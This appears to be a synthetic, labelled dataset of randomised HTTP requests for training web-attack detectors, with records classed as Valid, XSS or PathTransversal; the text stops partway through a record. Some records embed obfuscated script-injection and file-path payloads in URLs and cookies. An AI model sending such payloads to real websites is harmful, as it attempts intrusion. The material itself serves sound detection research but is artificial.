If-None-Match: "PSCKtxVSvtA33.xZM5-L"
If-Range: "2SEy-dBl2x3xICyzZ_2"
Max-Forwards: 468
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: mptt usyihe=Tgnd6n
Range: 4947-
Referer: http://www.tihdn.ch/iieetuh.tar.gz
TE: deflate;q=0.7,trailers,deflate
Trailer: From
User-Agent: ee0ou2re/0.3.1
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 894x439
Via: FTP/8.8 www.kek5n.css:6652
Transfer-Encoding: identity
Upgrade: 5itIE/7.2, iAlg/7.5
Warning: 127 197.55.244.77 "fosrtaeywgeT" 
X-Forwarded-For: 191.180.248.237
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25357
Start - Id: 47287
class: XSS
GET /edOhitktanociirrA/qbody/3fa/0zK7innimgcBhperlR/yAcVg9/Sncbts/k1cI/nR2AWXe7jET-f/WlR.html?qs3eo=4696&ezkn=%3Ca+++++href++%3D++++%22+about%3A%3Cs%26%2399%3Bript++%3E%5Balert++%28%279ihnac%27%29%3B%5D%3C%2Fscript+%3E%22+++%3E&OteaA=processing-instructionr+83dis7%2Be3osdi%29tqbgsound&Rmt6uf=sampE%3EUNlho%406+&dqSnkt=d_0W&eigihwaxneez=seaik&tkl93gt6opwE=98&sueh=3306928700&Ov9busrE=obogTcnhahdt&SR1BAlhxQw=%28systema%3E&ep0luO=tUD4w09T6WN&OtbtoHcd1ok=pperlthf7t1ataecp&To6Eaxscbr=trcpb%24 HTTP/1.1
Host: www.rPsq3ser.gov:80
Connection: rieanrad
Accept: image/gif
Accept-Charset: cp-936, iso-8859-2
Accept-Encoding: 
Accept-Language: 0aFin-ce
Cache-Control: no-store
Client-ip: 156.129.47.155
Cookie: ietdp=io5t3mty5riD;nass2chnaofsst=cwrvHrrketvu(&a;svrNPu2vna=60274
Cookie2: $Version="2"
Date: Wed, 31 May 06 13:16:13 UTC
ETag: W/"jSeqzLUF58FHfui"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Tue, 22 Dec 09 15:20:25 GMT
If-Unmodified-Since: Sat, 03 Jun 06 09:31:13 UTC
If-Match: "Ijdfl3Cv6onbg6dETGq"
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Tue, 07 Mar 06 08:18:59 UTC
Max-Forwards: 5
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: aoettc ieuvn1n=T1or
Authorization: Digest response="A7BB157Bcc54feF1FDD2ccAbdeeDadB0"
Range: -4,7256-5,39-5314
Referer: /requi/mTahns.cgi
TE: chunked;q=0.4,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: lnTtnt/6.3
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 41548117703
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47287
Start - Id: 33653
class: Valid
POST /VVptTL_pQnS0F/it9si1wegRSrhi/ipLQA-ISxFH@Xci/tncNqsservicesu5D/t6oWL6oWHsWbi/d5azSweT/BQt./yezlduedstTitaei/L6C/zsE5TLid.php4? HTTP/1.0
Content-Length: 114
Content-Language: fuRu,Ant4,atM
Content-Encoding: deflate
Content-Location: http://fa7srte.net/aI6hwi5s/Weebhrsu/eiya.asp
Content-MD5: eWZ0ZWhkZWk1dVkxYWN0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jun 08 12:28:06 CET
Last-Modified: Mon, 28 Mar 05 06:59:48 CET
Host: 235.216.132.201
Connection: npcan
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.8, big5;q=0.6
Accept-Encoding: compress, deflate, identity;q=0.8, gzip
Accept-Language: dMpdrts3-rqaeisaa, tw-kekzem, hl-o2g;q=0.8, 6reodcro-u27oer, 6ru-Xse;q=0.8
Cache-Control: max-age=4
Client-ip: 113.146.215.236
Cookie: wheredeletenc4bU_=34135;m4foesa0Ac=htg;thrge=9;m2ne=6426
Cookie2: $Version="136"
Date: Wed, 05 Nov 08 13:56:54 CET
ETag: "uDkvoVUULN0XGOr"
Expect: wuct9=bteroet;jnmauty
From: diro@y1e50IxI.com
If-Modified-Since: Sat, 25 Apr 09 21:52:01 CET
If-Unmodified-Since: Wed, 10 Oct 07 23:48:48 GMT
If-Match: "CqoGdboyJBgd8W0pdc9"
If-None-Match: *
If-Range: Mon, 14 Mar 05 13:48:35 CET
Max-Forwards: 07
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: ecrhet tsDhit=aneesaei
Authorization: NTLM N25zcmQyMW81bG5nMHllY2hlaW5idG5lcnJvZWR3Tm9qZmVvb3pzc3VvSXM=
Range: -9929
Referer: http://a6cOa1.com/thee/Sonb/PehaN.wav
TE: deflate
Trailer: Accept-Language
User-Agent: hLyrcf9N http://www.luyq.ch
UA-CPU: PowerPC
UA-Disp: 7061,069,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3257x6651
Via: 6.3 248.57.37.101:6152, HTTP/0.5 www.glfe.jpg
Transfer-Encoding: identity
Upgrade: ihLGi/8.8, n6tsu6/2.8
Warning: 401 www.pmasktsm.tiff "Gnraeghlrgas0satn" "Wed, 14 Sep 05 23:59:17 CET"
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 6339975961282
----: ------------
~~~~~: ~~~~~~~~~~

oo8=rtu&whereud9pqopt2TS8A=127842&soDorc=echmrG4yjiotier&tuyutw=shall5iysre>yRnet6nih&gy=metpatdrnbn2&btalt=9095

End - Id: 33653
Start - Id: 44870
class: PathTransversal
GET /iauhn6ivehmirsvholhs/nQUYfXPAfWdIb_zopyS/kbai/nfebMpt/e8/tlMLwo08ngc/l4Gs/y6VmFbCwiC/etdLdtsme3nzcqLnMl9.php4?ohIetlw=13075712&eknxridcrdwr=hnu&pRtJbin2I1K6P=e%3A%3Dtsaccess_logrohrbscripte+n&3aaaelmuec=doc%28+file%3A%2F%2F%2Fc%3A%2Fn1aer%2Faan.xml+++%29&bGy8sfCN0dRz=y&tyrnlp9aEN=61942&vh8tiioAdilnm=pbtidHcs&csodaieisdaa4hs=nSY0huhi63GD&pYZAPnprocessing-instructionu=rmn&qrh=Njncopy&idh=d%28afeepformeagifLf0tneaccept&tdndynyae7na=ian%26D%2Fe&23oae=qaIlr%3Dnd%27passthrute&ndsipbonsa=%5Bperlyi7 HTTP/1.0
Host: 177.151.204.43
Connection: sux7sot
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: WExlb-Et5, krsi-Ntztw, tan7akts-tsic;q=0.4, ng6Eshm-bnc9, ibn-RetA0nJn
Cache-Control: 3ohosacd='o4en'
Client-ip: 32.25.74.7
Cookie: 1ryurSd5=yn;i7gejo7aea=lxaeloptt7p4sa;si7fqus=it3e nyscriptm G;wornsicaegp=na-=nvme'4sock_stream0iframea]etwh[;mi9o8R=633598
Cookie2: $Version="6"
Date: Thu, 06 Oct 05 05:56:07 CET
ETag: "1zhRIGqs9bhrirWiAR"
Expect: ritRee
From: alne@9raesl8.gov
If-Modified-Since: Sat, 27 Mar 04 12:51:55 GMT
If-Unmodified-Since: Thu, 30 Aug 07 14:33:50 CET
If-Match: "pmfY041lx7FgKFTLov"
If-None-Match: "UunXHK8cxJ-@RnFOhpj"
If-Range: Sun, 10 Sep 06 10:18:29 CET
Max-Forwards: 1
MIME-Version: 5.3
Pragma: fYnuie=to
Proxy-Authorization: Basic aW1hdmVhOjhjbW8=
Authorization: NTLM Y2M4dGFpZWxGcWNlZnNvb3RvZWFnZGF3ZnJieW9ycm95aW1jaXM=
Range: 165-47102,-98
Referer: http://www.oaotee.gov/sjt3nhcH.pdf
TE: trailers,deflate
Trailer: User-Agent
User-Agent: esnIiaee/1.9.4.8
UA-CPU: PowerPC
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 1.3 www.pseesld.js
Transfer-Encoding: lSived
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44870
Start - Id: 10988
class: Valid
GET /ez/Molrvnope0eenqzihlr/ud3l8acna/OOTWHYsYphpHiO-/p4anV.FOtfqFzT.1X3.php?dgpl2d=52&hzH=l6aS&elpneaaote=yyQB3v&hb9sohc=211161&Asm=et&XJ38M4evalN=aZy..uJi5es&hmh6dver=l4nm7recyCEwUalbn&wtti=alVqQ&QsystemK@as6H=u%27&7hoOdip=aNsTaotbeboot.ini4Tsitllna3&hruu7=ats+o&a8Jr7ilhOnot=rdao%29Dg&styleplib8RoV=ae5f-Ow&bs=798 HTTP/1.0
Host: 189.47.138.135
Connection: keep-alive
Accept: text/*, application/*, video/mpeg;q=0.9
Accept-Charset: isiri-3342, koi8-r;q=0.4
Accept-Encoding: deflate, compress;q=0.7
Accept-Language: vnfR-9ii, Sgm-mp4Be;q=0.0, rsssxlt-oT, sE-euubea
Cache-Control: no-store
Client-ip: 174.60.171.41
Cookie: phyhesm=entqsUren;fne5l8=na
Cookie2: $Version="75"
Date: Wed, 20 Dec 06 03:49:27 UTC
ETag: "l3Um3FuC_D3@Yj0mc"
Expect: clhiat
From: Oimrip@itut.fr
If-Modified-Since: Fri, 23 May 08 12:05:54 UTC
If-Unmodified-Since: Mon, 09 Jan 06 16:46:38 CET
If-Match: "4SQj9-fWtk3.kD8Los5"
If-None-Match: "oU9S8HJbwoaqhC0lb"
If-Range: *
Max-Forwards: 4348
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM Z2F6Y2dudGFpcm9Nc3lpb3lkZWFUYnBuaWUzb2lkbnNzb2V2YWFsYQ==
Range: 415535-51
Referer: http://nsytP9o2.it/ivmnnyc/Shea/iec6.png
TE: gzip,trailers,gzip;q=0.2
Trailer: From
User-Agent: 1kuoetsd (sWWU8ER37)
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 124x705
Via: ioiay/8.0 www.tnpn9.js, 0.4 www.einut.gif
Transfer-Encoding: gzip
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 502 www.a6ETf3aa.jpeg "ihitc" "Mon, 05 Nov 07 14:03:56 UTC"
X-Forwarded-For: 40.189.230.161
X-Serial-Number: 109708230731
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10988
Start - Id: 29451
class: Valid
GET /tvK@/tz/e4ndfop72Oarueccr4l/eolhceeas/rcQfEZe8Se1W7-9elp/pT2.BP3_B77/edpiugd/eC1XBF/ahu/vDs07/3laiuykdewe7/uyyuh.sh?EaOtUxuefkbimr=aFO&ntgboemcee=9&AcrF_Q=74&LBLmeta=n.Cm&2telnetpg8WP=%7Et&lse4sine=7&x8zi=s&oE=n&tHrhO=slibsa+formbinntn%3Cnn6%40home+l HTTP/1.0
Host: www.cnGScn.st:0
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tuajrkoa-ma, 7me-chi;q=0.6, erdrae-Enr;q=0.8
Cache-Control: max-stale=20
Client-ip: 38.179.162.14
Cookie: ienpcrf5TsiohuU=etfdrcp;tn=tya0ht0;fUhvg=betweenwe;iadtiee=oWXZ;Ia=e9N;UeHnnfcocdttie=tcL9LmcK8jfa
Cookie2: $Version="9"
Date: Sun, 22 Jul 07 19:07:51 UTC
ETag: W/"w5pNSv_EbPM6fZqgoA"
Expect: 100-continue
From: moneAdh@fg3imxt.net
If-Modified-Since: Fri, 12 Oct 07 06:25:53 GMT
If-Unmodified-Since: Fri, 08 Feb 08 08:51:46 CET
If-Match: "pxx-FaY1FExtLIb"
If-None-Match: *
If-Range: "W4xFKoHEZQPvIZbIE"
Max-Forwards: 4228
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZDFkcUw6ZW93NGNpcg==
Authorization: Digest nc=445BEEbc
Range: -607,2-,5238-
Referer: http://www.cfaN8yh.com/snnfarng/AaselI/arAiHr/nly3bamd.msf
TE: trailers
Trailer: From
User-Agent: elindporcmoe
UA-CPU: PowerPC
UA-Disp: 206,807,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6889x7208
Via: FTP/1.0 246.96.191.135:82, 7.0 www.lnec.gif
Transfer-Encoding: identity
Upgrade: prltnc/9.6, vtkuzg/2.7, rvtwsa/5.2, e7yuc/3.8
Warning: 881 224.80.69.65:4958 "uy4Z" 
X-Forwarded-For: 25.153.217.247
X-Serial-Number: 7353709606596802316
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29451
Start - Id: 20715
class: Valid
GET /rmkndDte3tdacsihonh/oMXZpL/S1ue7msmott9pz2/ykovimadtht/msYZT/xHjArhn_6wadminoctf/uH.YpYWLSvv3/h1dpE13_qa/mrs/alu/@v/etS5yoa.aspx?e9eac5oa3telh=utmpclog&RsAoxoT=hT9rdivhl3daAGPstylea&eQer=0&3nafi=1293&emlKrrprf=wexaReoi4d&nEitmtep9uwi=cqE&usrshutdownsHgqvarAhttp=cMoTS&6a=+eEn&oOdQNxf=889&eEwoic3et=c1tepcpsoReino&efnl=8057&4W@m5deletexallreplace=5SLFk3N%40_Nki&ew0wctNiatTOssI=3959548&AheBlv3aD=4&wobCtbj3w2iau8=itNeeiexuoe HTTP/1.0
Host: 0.145.129.27
Connection: 9eit
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: 1pwe-l, e-thQuno;q=0.5, rys-dp
Cache-Control: max-age=731
Client-ip: 236.152.90.61
Cookie: nw5duein=e+;vetlheeht2usn=ii ae)jr;flh=73901
Cookie2: $Version="0"
Date: Thu, 08 Jan 09 17:12:03 CET
ETag: "XCfTQ8sYzPf8E@3jCGX"
Expect: fsatzel
From: mupderg@gn978yed5.fr
If-Modified-Since: Mon, 07 Jun 04 17:03:16 GMT
If-Unmodified-Since: Thu, 09 Jul 09 19:49:51 GMT
If-Match: "niBPw-co_9shziqdU1I"
If-None-Match: "lB_zbDAyJsalT93W"
If-Range: "4C7Y_57OlkY5LvU"
Max-Forwards: 362
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: Digest nonce
Range: 15-,71-,5-
Referer: /atetlE.asmx
TE: chunked;q=0.5,chunked,trailers
Trailer: Via
User-Agent: Mozilla/4.5 (compatible; Konqueror/2.5; SunOS sun4u; ya6lw; tme1tje0la; vHie)
UA-CPU: MIPS
UA-Disp: 4030,457,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 413x553
Via: eha/2.4 www.soysNfid.jpeg
Transfer-Encoding: compress
Upgrade: 3tlgha/2.3
Warning: 191 www.wieantnn.js "ceso9ieb2g3sfseiu" "Mon, 18 Oct 04 12:22:32 UTC"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20715
Start - Id: 34162
class: Valid
POST /to9xh.cfm? HTTP/1.1
Content-Length: 318
Content-Language: c,e,t5l
Content-Encoding: deflate
Content-Location: http://Ysu6a7.de/e5i7/eaussT/Ot5ont/neahnnht/0naf.tiff
Content-MD5: dHlJbGVZbmRlbm1nT21Eeg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 11:43:50 CET
Last-Modified: Tue, 25 Dec 07 14:59:06 CET
Host: www.tspigm.biz
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8-r, windows-1250;q=0.9, utf-7, iso-8859-3
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.106.129.24
Cookie: a2dasrelQlsot=u;irhtalenmonsen=otIez;hfr6im=47665833;Toeoaot=5076915994
Cookie2: $Version="0"
Date: Mon, 12 Apr 04 22:42:40 UTC
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Sat, 11 Nov 06 22:24:56 CET
If-Match: *
If-None-Match: "icP@LPITUg@y_LQeq-JY"
If-Range: "z@7KfC0L2Mrrw.g"
Max-Forwards: 1112
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: NTLM cnFpMzNzSGJoZG9ob3VhYWF0clRyYWVyZnR0YWVpNHN6elhl
Range: 713-,7885-54
Referer: http://mrhehs.com/w6U1et/F1dntjf/07ota/qdilel.mdb
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.9 (Windows; U; WinNT 9.0; ty-On; rv:0.9.3) Gecko/69825057
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 6.4 www.ifmonntr.css
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

In_OmSdelete=d-H4Kos&mbzrutrUomPt=iti6srnliem&OJprocessing-instructionVK0no0jV=dl7oee&WJ2F_hhttps-iGH=a&nieeishshinvSje=U0tanortitWlaar&aaytSmiAhC=zb1Z&_KTTOexeccinput.Fzcmd=Ri;>&t2xlsmnntnt=inserthaltinsert&sfmlhn9woT=0981&iofAqokttv=01452&g6oUounSalwl=rionOSnclsnrEhoc&ierdwtusmw=0&3JJNvP4=471651489&cRssnd=srtgd

End - Id: 34162
Start - Id: 28944
class: Valid
GET /2@CY95V_/fuZITya/soSanoi7tszmww/wI7hQ0L.7V16PgW5s/lpHuyN/tia1ee/iuML7JlGOD.tiff?QlidPW7b-=49&oINpw=c1L42Oq5&keCewSdofpqcd=dUuQ&ittfaesaen=sax6oahysel&TW856UzS=e.8qHwy&nwMsctfs=hxCk1 HTTP/1.0
Host: www.ap3hofcl8.biz:85
Connection: ilio7
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: crgS-nsiu;q=0.8, as-nacel;q=0.9, rhyehp5d-hfue
Cache-Control: 7snaua='rb'
Client-ip: 194.251.101.26
Cookie: itbieiEttde=tJtjT;nrTnne=rirhgals;2oNNiandD8r=ebp9mKn56S
Cookie2: $Version="7"
Date: Wed, 16 Feb 05 16:51:32 UTC
ETag: W/"JQAvX3IO4HixKGPe5"
Expect: r9naTT0=pihtop;7hcs
From: t9orln@obrekngulw.gov
If-Modified-Since: Tue, 11 Oct 05 19:49:17 UTC
If-Unmodified-Since: Tue, 31 Mar 09 21:11:50 GMT
If-Match: *
If-None-Match: "za4diPP4WxtXflf"
If-Range: Fri, 09 Oct 09 19:23:16 UTC
Max-Forwards: 4090
MIME-Version: 4.1
Pragma: tr1tr=odh6be
Proxy-Authorization: Basic c2VUOG9oOTE6Ym5hZm5JMw==
Authorization: Digest response="c6E1bCFfdafbC348be1a28eDd3Ca0FDb"
Range: 61-3,829861-041284,-446
Referer: /iny3n7yn.asmx
TE: gzip
Trailer: User-Agent
User-Agent: w2nebih (c2rc7xs)
UA-CPU: MIPS
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 552x545
Via: snerOs/3.2 138.0.167.192, 0.1 www.elYm.jpeg
Transfer-Encoding: compress
Upgrade: 9zTj/4.9, nzwna/5.5, gjydto/4.3, wese/6.3
Warning: 913 174.91.7.44 "xdueAm" 
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 35671397692
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28944
Start - Id: 13377
class: Valid
GET /0Mp4/Awc5Ils/b8fFi@G8mPlj1ucYNs/gA/nuu0JbZ0/LnuQ.aspx?ihBVSV=n0eeosNnfiearonst&auie=45310&dOstp=emq_AwNZJ7D&ucauocc8=passthru&us=rDu&ttrhofoRkhM=Tt0cbodyjbtihi2x9&5reuwthisiezts=3hoNaQTgzD&el8sndiuh4f0mA=%7E%24&M@IL.PG=74&Ttentioeee=Yelo91i5oiA7ifeosg&pedLcqaW=4 HTTP/1.1
Host: 59.171.41.1:10
Connection: Gswtt
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity;q=0.1, deflate;q=0.7, deflate, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 88.65.120.166
Cookie: 4catBJV8A-=8589738;bun1tesDTy=nz@dP0Yit;se4o4j=cctowqwindow.openi;lo=deaigi;pes=3522
Cookie2: $Version="49"
Date: Fri, 10 Dec 04 02:50:37 CET
ETag: "mVTIfSsrNEGj8T2Oh"
Expect: 100-continue
From: 4butpT@e0niqeT8.uk
If-Modified-Since: Wed, 28 Feb 07 21:47:35 GMT
If-Unmodified-Since: Fri, 04 Aug 06 13:37:08 CET
If-Match: *
If-None-Match: "Jah3CxPZrg1Y8I8s3Gf"
If-Range: "MHk4tpLHDfutExDvyW"
Max-Forwards: 9499
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic eThuMzIwOm5hZWVlZA==
Range: 30-,-79267,97-361160
Referer: /IHopt5t/5xoytes7/yuqiles4.htm
TE: trailers,chunked;q=0.3
Trailer: Warning
User-Agent: Mozilla/7.6 (X11; U; Unix 8.9; wy-4t; rv:2.5.1) Gecko/40981756
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8753x0793
Via: 0.7 201.133.41.30, 7.3 64.162.13.23, 9.9 www.7e2re.js
Transfer-Encoding: gzip
Upgrade: beend/1.7, tgea5/9.2, 4belk/7.6
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 235.128.16.55
X-Serial-Number: 256974245267
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13377
Start - Id: 14652
class: Valid
GET /Bmes3/4botelulrmxtsipe2/ejnim/r4rthstilsess1bs/AMFDvVjk7/gsssRgwchhnpldIentbc/xauthnoerh/t5Ehj4-r9F/0rFA6httpsRopt4-a7JH0/nmhncn4rio/ynagdheaItxtooAknn8s.htm? HTTP/1.0
Host: www.tw6o.biz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: nlts-sHreat4C;q=0.3, vNnselr-ill4n8i;q=0.1, hde1njI-snt, idhs-s
Cache-Control: no-transform
Client-ip: 8.162.62.163
Cookie: wweauhmeinet=niA0de;YUExwZyetc_=mtr;3drgtdepBnraDof=child4hrdeoevsTd;hsmric=i8O
Cookie2: $Version="16"
Date: Sat, 23 Jul 05 13:32:15 CET
ETag: "6mSMty0yBLjXo7I_3cJ"
Expect: dejnL
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Thu, 27 Oct 05 23:11:13 GMT
If-Unmodified-Since: Tue, 03 Jun 08 10:57:13 UTC
If-Match: "qglIcWWZnxiYVxD1D"
If-None-Match: "rHNu-VOQUxzUTDm_D"
If-Range: Fri, 23 Nov 07 22:01:55 GMT
Max-Forwards: 59
MIME-Version: 5.9
Pragma: noedt=8
Proxy-Authorization: ijwut osgnals=mtekhgsY
Authorization: Basic bXJvOGg1YzpydGhuaQ==
Range: 065-,368-,-063233
Referer: /xserQ/gvb3bhd.wav
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (Windows; U; WinNT 9.0; cc-s9; rv:1.3.9) Gecko/61780104
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: 6.1 www.Hmitn.gif:21, 2.9 105.20.125.24:8696, FTP/3.9 35.184.214.165
Transfer-Encoding: identity
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 513 www.oi02wq.gif "tu7S" "Mon, 16 May 05 01:52:04 CET"
X-Forwarded-For: 243.163.162.130
X-Serial-Number: 8994471489
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14652
Start - Id: 48251
class: XSS
PUT /hTCr/iqi7keoi/t.c1a/ev5Al/oa7/sn4zcSJChv7Hk/lo9htaibrpitxjlptVlr/kohsfh/ih10/acrvxjUsntot2.tiff? HTTP/1.1
Content-Length: 212
Content-Language: utsu4m,inneAll,xhlenkh
Content-Encoding: deflate
Content-Location: /ieil/ktnta/ebnn/aitIsEV/trte5t.jpg
Content-MD5: dHVJc0F0Z3V0cWxPbmE1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 09:12:44 CET
Last-Modified: Sun, 28 Mar 04 14:56:42 UTC
Host: 114.217.120.214
Connection: keep-alive
Accept: image/gif, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: min-fresh=3115
Client-ip: 182.187.98.155
Cookie: eeO=<a    href =  "     about:<s&#99;ript  >[alert   ('asohm');]</script  > "   >;amiaReguesNNlie=28892
Cookie2: $Version="2"
Date: Tue, 31 May 05 19:11:37 GMT
ETag: "cr5Cpd59of.@swB97"
Expect: 100-continue
From: leoau@ioycU5in.ch
If-Modified-Since: Fri, 25 May 07 24:29:28 UTC
If-Unmodified-Since: Tue, 16 Nov 04 18:01:06 GMT
If-Match: "QBR3KPfUl-lPun-CAUI-"
If-None-Match: *
If-Range: Mon, 11 Jul 05 24:17:23 CET
Max-Forwards: 0
MIME-Version: 4.8
Pragma: i=htwqw8
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 1099-42048,18-50962
Referer: http://frn5aoad.st/sbcpEp/gQdh.asmx
TE: gzip,trailers,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: erTzQqKdq http://www.aierta.gov
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9341x017
Via: 7.6 113.13.0.48, 0.5 www.oea1.html, 8.0 255.38.164.113
Transfer-Encoding: gzip
Upgrade: anpU/1.3, qtqiol/8.7, eiaeO/6.1
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 50764903670932
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

iIDTes9=srae8&MWejt4=hbn&QAhttpX=ta9ozsvnco9un&irwytn1nvttts=i6k4Ybyrj&hbalwtoauytu=98&azwo4dhhii=wsam3erfld/si%u&eetoitao=lZhS2&acNlsete=HDnnamoyaEeue&Foi=tet: \lc>ahdoh&s2wtsihde=oetcrv klti |rlnonz

End - Id: 48251
Start - Id: 1777
class: Valid
GET /i6avrosno/fddnmww/wnrtfrNQwM0V8K_Ra/Ps8Dz/g@U_t9/ghEb4te/bo89lTtou/ceenad2Kdio9hzltfn/2Rrh2bdqfhllxse6.php4?vbscriptGdMK_Av0Q=+&doEdauE0s0rct=473&hpwna=dt3ml7r9ineowaaj&eiapcrqessdem=Z&OVpXuk8Hvevalr=zm3osr&KXHg55EzQ_=5872 HTTP/1.0
Host: www.rwunioc.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, gzip, compress;q=0.0, compress
Accept-Language: ioo3atoa-rtjn
Cache-Control: no-cache
Client-ip: 21.72.18.201
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="22"
Date: Mon, 31 Oct 05 07:18:13 GMT
ETag: W/"m4CjLAtP7IC3FCI0_aT"
Expect: 100-continue
From: hoiiT@iran.org
If-Modified-Since: Mon, 03 Oct 05 24:36:57 UTC
If-Unmodified-Since: Thu, 26 May 05 08:17:05 CET
If-Match: "JNzLZZwH3AKkofL5@AIc"
If-None-Match: *
If-Range: *
Max-Forwards: 7084
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic cmdjbXF1Omx1bmE=
Authorization: Digest cnonce="n7ioOavl"
Range: 2506-
Referer: /zuaa2oe/poeetrdh/0soeaii/Lwoae9is/izktsjc.cfm
TE: chunked,deflate;q=0.7,chunked
Trailer: Accept
User-Agent: mii0Ezpr6/6.5
UA-CPU: StrongARM
UA-Disp: 0437,4015,8
UA-OS: Win9x
UA-Color: color8
Via: FTP/7.4 142.86.94.12, 7.4 178.253.189.86
Transfer-Encoding: sesHe
Upgrade: oud/1.3, oTteo/6.8
